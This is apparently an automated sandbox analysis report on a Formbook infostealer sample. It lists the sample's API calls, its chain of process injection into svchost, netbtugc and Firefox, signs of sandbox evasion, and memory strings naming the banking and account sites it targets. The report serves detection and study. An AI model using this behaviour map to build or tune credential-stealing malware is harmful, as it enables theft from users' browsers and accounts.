            Source: 00000006.00000002.4603508977.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@16/7
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F2CE7A GetLastError,FormatMessageW,0_2_00F2CE7A
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F1AB84 AdjustTokenPrivileges,CloseHandle,0_2_00F1AB84
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F1B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00F1B134
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F2E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00F2E1FD
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F26532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00F26532
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F3C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_00F3C18C
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00EE406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00EE406B
            Source: C:\Users\user\Desktop\CCE 30411252024.exeFile created: C:\Users\user\AppData\Local\Temp\autECA6.tmpJump to behavior
            Source: CCE 30411252024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\CCE 30411252024.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: netbtugc.exe, 00000006.00000003.2517694990.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4603587776.00000000009DF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4603587776.0000000000A2F000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4603587776.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2520094357.0000000000A0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: CCE 30411252024.exeReversingLabs: Detection: 73%
            Source: unknownProcess created: C:\Users\user\Desktop\CCE 30411252024.exe "C:\Users\user\Desktop\CCE 30411252024.exe"
            Source: C:\Users\user\Desktop\CCE 30411252024.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CCE 30411252024.exe"
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\CCE 30411252024.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CCE 30411252024.exe"Jump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\CCE 30411252024.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\CCE 30411252024.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\CCE 30411252024.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\CCE 30411252024.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\CCE 30411252024.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\CCE 30411252024.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\CCE 30411252024.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\CCE 30411252024.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\CCE 30411252024.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\CCE 30411252024.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\CCE 30411252024.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: CCE 30411252024.exeStatic file information: File size 1191424 > 1048576
            Source: CCE 30411252024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: CCE 30411252024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: CCE 30411252024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: CCE 30411252024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: CCE 30411252024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: CCE 30411252024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: CCE 30411252024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UIOYLdBBxOZnTzrp.exe, 00000005.00000000.2243558952.000000000006E000.00000002.00000001.01000000.00000004.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000000.2398470881.000000000006E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: CCE 30411252024.exe, 00000000.00000003.2157438700.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CCE 30411252024.exe, 00000000.00000003.2157797690.0000000003860000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2226784005.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2318557718.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2224840210.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2318557718.000000000369E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4604829627.000000000330E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4604829627.0000000003170000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2329854953.0000000002FBD000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2318712990.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: CCE 30411252024.exe, 00000000.00000003.2157438700.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CCE 30411252024.exe, 00000000.00000003.2157797690.0000000003860000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2226784005.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2318557718.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2224840210.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2318557718.000000000369E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000006.00000002.4604829627.000000000330E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4604829627.0000000003170000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2329854953.0000000002FBD000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2318712990.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000002.2318259516.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2285670458.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 00000005.00000003.2255779981.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000006.00000002.4605259560.000000000379C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4603587776.000000000097E000.00000004.00000020.00020000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604826888.000000000318C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2637377690.000000003C10C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000006.00000002.4605259560.000000000379C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4603587776.000000000097E000.00000004.00000020.00020000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604826888.000000000318C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2637377690.000000003C10C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000002.2318259516.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2285670458.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 00000005.00000003.2255779981.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp
            Source: CCE 30411252024.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: CCE 30411252024.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: CCE 30411252024.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: CCE 30411252024.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: CCE 30411252024.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\CCE 30411252024.exe | Code function: 0_2_00EFE01E LoadLibraryA,GetProcAddress, | 0_2_00EFE01E
            Source: C:\Users\user\Desktop\CCE 30411252024.exe | Code function: 0_2_00F06B05 push ecx; ret | 0_2_00F06B18
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004048A9 push esp; ret | 2_2_004048AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041E2BA push 00000038h; iretd | 2_2_0041E2BE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A436 push ebx; iretd | 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418C92 pushad ; retf | 2_2_00418C93
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A5D9 push ebx; iretd | 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004017E5 push ebp; retf 003Fh | 2_2_004017E6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403780 push eax; ret | 2_2_00403782
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004147A2 push es; iretd | 2_2_004147AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035309AD push ecx; mov dword ptr [esp], ecx | 2_2_035309B6
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | Code function: 5_2_02EA2BF6 push 00000038h; iretd | 5_2_02EA2BFA
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | Code function: 5_2_02E891E5 push esp; ret | 5_2_02E891E6
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | Code function: 5_2_02EA7FB4 push FFFFFFBAh; ret | 5_2_02EA7FB6
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | Code function: 5_2_02E9CF68 push ebx; ret | 5_2_02E9CF69
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | Code function: 5_2_02E9EF15 push ebx; iretd | 5_2_02E9EF3C
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | Code function: 5_2_02E9D5CE pushad ; retf | 5_2_02E9D5CF
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe | Code function: 5_2_02E9ED72 push ebx; iretd | 5_2_02E9EF3C
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031A09AD push ecx; mov dword ptr [esp], ecx | 6_2_031A09B6
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_0053101F push es; iretd | 6_2_00531027
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_00521126 push esp; ret | 6_2_00521127
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_0053D1B0 push es; ret | 6_2_0053D1D0
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_00532238 pushad ; iretd | 6_2_00532239
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_0053550F pushad ; retf | 6_2_00535510
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_0053AB37 push 00000038h; iretd | 6_2_0053AB3B
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_00536CB3 push ebx; iretd | 6_2_00536E7D
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_00536E56 push ebx; iretd | 6_2_00536E7D
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_0053FEF5 push FFFFFFBAh; ret | 6_2_0053FEF7
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_00530EAB push ebp; retf | 6_2_00530EAC
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_0052FFA0 push esi; iretd | 6_2_0052FFA5
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_00D8429A push cs; retf | 6_2_00D842F6
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_00D84268 push cs; retf | 6_2_00D842F6
            Source: C:\Users\user\Desktop\CCE 30411252024.exe | Code function: 0_2_00F48111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, | 0_2_00F48111
            Source: C:\Users\user\Desktop\CCE 30411252024.exe | Code function: 0_2_00EFEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, | 0_2_00EFEB42
            Source: C:\Users\user\Desktop\CCE 30411252024.exe | Code function: 0_2_00F0123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 0_2_00F0123A
            Source: C:\Users\user\Desktop\CCE 30411252024.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\CCE 30411252024.exeAPI/Special instruction interceptor: Address: 1058F1C
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357096E rdtsc 2_2_0357096E
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 4708Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 5263Jump to behavior
            Source: C:\Users\user\Desktop\CCE 30411252024.exeEvaded block: after key decisiongraph_0-93556
            Source: C:\Users\user\Desktop\CCE 30411252024.exeAPI coverage: 4.4 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI coverage: 2.8 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1776Thread sleep count: 4708 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1776Thread sleep time: -9416000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1776Thread sleep count: 5263 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1776Thread sleep time: -10526000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe TID: 3200Thread sleep time: -75000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe TID: 3200Thread sleep count: 35 > 30Jump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe TID: 3200Thread sleep time: -35000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F26CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00F26CA9
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F260DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00F260DD
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F263F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00F263F9
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F2EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F2EB60
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F2F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00F2F5FA
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F2F56F FindFirstFileW,FindClose,0_2_00F2F56F
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F31B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F31B2F
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F31C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00F31C8A
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F31F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00F31F94
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0053BAB0 FindFirstFileW,FindNextFileW,FindClose,6_2_0053BAB0
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00EFDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00EFDDC0
            Source: F56GKLK7U4.6.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: F56GKLK7U4.6.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: F56GKLK7U4.6.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: F56GKLK7U4.6.dr Binary or memory string: discord.comVMware20,11696487552f
            Source: F56GKLK7U4.6.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
            Source: F56GKLK7U4.6.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: F56GKLK7U4.6.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: F56GKLK7U4.6.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: F56GKLK7U4.6.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: F56GKLK7U4.6.dr Binary or memory string: global block list test formVMware20,11696487552
            Source: F56GKLK7U4.6.dr Binary or memory string: tasks.office.comVMware20,11696487552o
            Source: F56GKLK7U4.6.dr Binary or memory string: AMC password management pageVMware20,11696487552
            Source: netbtugc.exe, 00000006.00000002.4603587776.000000000097E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: F56GKLK7U4.6.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: F56GKLK7U4.6.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
            Source: F56GKLK7U4.6.dr Binary or memory string: dev.azure.comVMware20,11696487552j
            Source: F56GKLK7U4.6.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: F56GKLK7U4.6.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: F56GKLK7U4.6.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: F56GKLK7U4.6.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: F56GKLK7U4.6.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
